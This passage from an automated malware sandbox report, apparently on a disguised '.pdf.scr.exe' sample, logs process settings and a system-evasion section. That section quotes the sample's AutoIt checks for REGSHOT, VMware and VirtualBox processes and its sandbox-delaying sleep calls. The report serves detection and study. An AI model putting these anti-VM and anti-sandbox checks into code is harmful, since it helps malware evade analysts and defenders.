      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM autoit script
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.332616328.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.315942638.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")`
      Source: ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475601066.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.478174099.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475387940.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477979894.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESS
      Source: ihgsvw.exe, 00000021.00000003.477385380.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475550316.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475281138.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477100320.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477315670.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475335079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: ihgsvw.exe, 00000023.00000003.495486843.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000002.498875275.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.497141076.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494456875.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493999375.00000000016A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN\N`V
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEKW
      Source: ihgsvw.exe, 00000015.00000003.382971984.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381984041.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383092560.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382181894.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381251567.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")^\
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334500241.0000000001730000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386006427.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
      Found API chain indicative of sandbox detection
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_6-64713
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752Thread sleep count: 63 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752Thread sleep count: 85 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236Thread sleep count: 61 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236Thread sleep count: 79 > 30Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6084Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968Thread sleep count: 31 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968Thread sleep count: 117 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5324Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756Thread sleep count: 105 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080Thread sleep count: 88 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712Thread sleep count: 62 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712Thread sleep count: 106 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752Thread sleep count: 114 > 30
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23511
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 9453Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 1561Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeAPI coverage: 8.4 %
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-23661
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then#+
      Source: ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exey
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe:
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
      Source: ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Thenzo
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exey
      Source: RegSvcs.exe, 0000000A.00000002.769785143.0000000001067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeb
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenYu8
      Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exee
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then0
